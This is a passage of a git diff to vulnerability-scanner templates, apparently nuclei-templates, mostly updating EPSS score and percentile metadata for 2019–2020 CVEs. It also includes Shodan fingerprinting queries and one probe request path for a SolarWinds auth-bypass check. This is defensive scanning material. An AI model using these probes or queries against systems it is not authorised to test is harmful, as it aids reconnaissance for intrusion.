cwe-id: CWE-601 epss-score: 0.00483 cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* + epss-percentile: 0.72859 metadata: max-request: 1 vendor: optergy diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index d463e3e438..7aae70d16a 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01275 cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.83989 metadata: max-request: 1 vendor: genieaccess diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 99971effab..6acfb66c0c 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 - epss-score: 0.92019 + epss-score: 0.93374 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.98715 metadata: max-request: 1 vendor: sonicwall diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 90e044d9bf..7cb33ae203 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00113 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* + epss-percentile: 0.44064 metadata: max-request: 2 vendor: kindsoft diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 4c0688c923..82209e9b5b 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-94 epss-score: 0.97232 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* + epss-percentile: 0.9975 metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index b0fddf8073..60ea67c86c 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-611 epss-score: 0.14515 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* + epss-percentile: 0.95041 metadata: max-request: 2 shodan-query: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index ec84f290b2..1d1d7edaf6 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.01669 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* + epss-percentile: 0.86063 metadata: verified: true shodan-query: http.favicon.hash:762074255 diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 0ac9b75b92..9a33a84dfb 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -14,6 +14,7 @@ info: cve-id: CVE-2019-8442 epss-score: 0.9715 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.99696 metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 33d604b5ec..f75ae6c001 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -13,8 +13,9 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8446 cwe-id: CWE-863 - epss-score: 0.0874 + epss-score: 0.11721 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* + epss-percentile: 0.94559 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 0ded4980f9..da0e6507ac 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 - epss-score: 0.14234 + epss-score: 0.1884 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.95564 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 0a9ecbbbb2..f5aa14d15c 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-918 epss-score: 0.97115 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* + epss-percentile: 0.9968 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index 7da3a6f00a..d28d969ae5 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8903 cwe-id: CWE-22 - epss-score: 0.02249 + epss-score: 0.0192 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* + epss-percentile: 0.87107 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index c199a4e721..fd988e44d8 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00921 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.80927 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index e6da718845..0df14a6247 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-918 epss-score: 0.02146 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* + epss-percentile: 0.87849 metadata: max-request: 1 vendor: wavemaker diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index cef42a950c..86bbe9c4bc 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-917 epss-score: 0.01127 cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* + epss-percentile: 0.82839 metadata: max-request: 1 vendor: zzzcms diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index a7dcb5cd25..e59052ad2f 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.0643 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.92768 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 07a352a51d..a7f1320033 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 - epss-score: 0.97534 + epss-score: 0.97513 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.9997 metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 3bdeac08e2..279ba4d419 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.02964 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.89569 metadata: max-request: 1 vendor: eq-3 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 8dbd535996..d7cbd3c291 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9733 - epss-score: 0.91482 + epss-score: 0.90473 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* + epss-percentile: 0.98408 metadata: max-request: 1 vendor: jfrog diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 7825dcf1a3..1e599ab1da 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9915 cwe-id: CWE-601 - epss-score: 0.00113 + epss-score: 0.0016 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* + epss-percentile: 0.52017 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 28a2b8f43f..50e7beca04 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-9922 cwe-id: CWE-22 - epss-score: 0.01083 + epss-score: 0.01413 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* + epss-percentile: 0.84822 metadata: max-request: 1 framework: joomla\! diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index 8e412b1673..ad8cb849f0 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9955 cwe-id: CWE-79 - epss-score: 0.05803 + epss-score: 0.0561 cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* + epss-percentile: 0.92301 metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index da830751ab..48b321a3ad 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9978 cwe-id: CWE-79 - epss-score: 0.97293 + epss-score: 0.97286 cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99784 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index cf42798ee7..5129d58833 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - epss-score: 0.97426 + epss-score: 0.97329 cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* + epss-percentile: 0.99813 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 21cde2e130..cd1c3ddc83 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -17,14 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 - epss-score: 0.97377 + epss-score: 0.97347 cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* + epss-percentile: 0.99832 metadata: max-request: 2 vendor: solarwinds product: orion_platform tags: cve,cve2020,solarwinds,rce,auth-bypass,kev - variables: string: "{{to_lower(rand_text_alpha(5))}}" @@ -35,6 +35,7 @@ http: - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index f4ff1e264c..2ee8173b0e 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -9,13 +9,16 @@ info: - https://twitter.com/iamnoooob/status/1246182773427240967 - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype - https://nvd.nist.gov/vuln/detail/CVE-2020-10199 + - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html + - https://cwe.mitre.org/data/definitions/917.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 - epss-score: 0.973 + epss-score: 0.97217 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* + epss-percentile: 0.99742 metadata: max-request: 2 vendor: sonatype diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 309596a7c2..23b30c0bd9 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10546 cwe-id: CWE-89 - epss-score: 0.39106 + epss-score: 0.4901 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + epss-percentile: 0.97048 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 17dd8cc2e6..6a85d4f949 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10547 cwe-id: CWE-89 - epss-score: 0.39106 + epss-score: 0.4901 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + epss-percentile: 0.97048 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 68e7f6a324..bef309e470 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10548 cwe-id: CWE-89 - epss-score: 0.39106 + epss-score: 0.4901 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + epss-percentile: 0.97048 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 5beb3d525c..3686f0bf63 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10549 cwe-id: CWE-89 - epss-score: 0.39106 + epss-score: 0.4901 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + epss-percentile: 0.97048 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index cb8a7d2531..d110ac274e 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-918 - epss-score: 0.37188 + epss-score: 0.37441 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* + epss-percentile: 0.9668 metadata: max-request: 1 vendor: redhat diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index b7cdf44bfc..fbb770a11d 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-10973 cwe-id: CWE-306 - epss-score: 0.02315 + epss-score: 0.03878 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* + epss-percentile: 0.90774 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index de6207bc32..6b8d757e1a 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-601,CWE-185 epss-score: 0.00396 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + epss-percentile: 0.7014 metadata: max-request: 2 vendor: glpi-project diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 300821eebc..594609b3a9 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00131 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.47313 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index c462175b8b..67f91bb09e 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -17,8 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - epss-score: 0.31408 + epss-score: 0.34975 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* + epss-percentile: 0.96566 metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index d75cc710df..5e8dcf5627 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11455 cwe-id: CWE-22 - epss-score: 0.3601 + epss-score: 0.5225 cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* + epss-percentile: 0.97134 metadata: max-request: 1 vendor: limesurvey diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 0dc42b848c..44a2ac4ad0 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00349 cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* + epss-percentile: 0.68242 metadata: max-request: 1 vendor: getgrav diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index ace035163d..4a66c1e8c0 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11530 cwe-id: CWE-89 - epss-score: 0.70149 + epss-score: 0.65013 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.9744 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 788c8da648..e2fce74085 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-94 epss-score: 0.96429 cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:* + epss-percentile: 0.99376 metadata: max-request: 1 shodan-query: title:"SuperWebMailer" diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 820d22a8f7..09ca16e599 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-306 epss-score: 0.0011 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* + epss-percentile: 0.43305 metadata: max-request: 3 verified: true diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 7a3c4c889a..de63450f9e 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2020-11710 epss-score: 0.02084 cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* + epss-percentile: 0.87657 metadata: max-request: 1 framework: kong diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index c422ff2777..9f810f48bb 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -19,8 +19,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11738 cwe-id: CWE-22 - epss-score: 0.97302 + epss-score: 0.97273 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* + epss-percentile: 0.99776 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index b77011938e..6fba21de14 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -9,15 +9,24 @@ info: reference: - https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-11798 + - http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html + - https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf + - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 + cve-id: CVE-2020-11798 cwe-id: CWE-22 + epss-score: 0.75314 + cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* + epss-percentile: 0.97741 metadata: max-request: 1 verified: true shodan-query: html:"Mitel" html:"MiCollab" - tags: cve,cve2020,mitel,micollab,lfi + vendor: mitel + product: micollab_audio\,_web_\&_video_conferencing + tags: packetstorm,cve,cve2020,mitel,micollab,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index cb5a636b62..3088685ab1 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -18,6 +18,7 @@ info: cve-id: CVE-2020-11853 epss-score: 0.94797 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.98954 metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 28d7985554..f5b8cfeb8b 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-798 epss-score: 0.97414 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* + epss-percentile: 0.99886 metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 0c02c4a382..8eeccfa7a9 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00396 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.70156 metadata: max-request: 1 publicwww-query: "/wp-content/plugins/gtranslate" @@ -48,4 +49,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 289518abca..98856ddf36 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.97524 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.9998 metadata: max-request: 4 shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 6c31e60a3c..2ac8c59119 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11991 cwe-id: CWE-611 - epss-score: 0.84866 + epss-score: 0.80318 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* + epss-percentile: 0.97888 metadata: max-request: 1 shodan-query: http.html:"Apache Cocoon" diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index ab5e3450bb..21026718ef 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00129 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.46935 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 31381df569..eef15e7b6a 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 - epss-score: 0.97344 + epss-score: 0.97355 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* + epss-percentile: 0.99837 metadata: max-request: 2 vendor: zohocorp diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 1cb30db2de..594c94f4ad 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306 epss-score: 0.03579 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* + epss-percentile: 0.90419 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 040710c4f2..5c8c5ffde9 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12447 cwe-id: CWE-22 - epss-score: 0.01261 + epss-score: 0.01778 cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* + epss-percentile: 0.86487 metadata: max-request: 1 vendor: onkyo diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index ffe9abc9d7..d12ebfb8ff 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - epss-score: 0.00761 + epss-score: 0.00901 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* + epss-percentile: 0.80707 metadata: max-request: 1 shodan-query: http.html:"teampass" diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 456e90fcb7..d310dee4d4 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.83523 + epss-score: 0.88108 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-percentile: 0.98245 metadata: max-request: 1 vendor: vbulletin diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index 6643002c52..bee84683e1 100644 --- 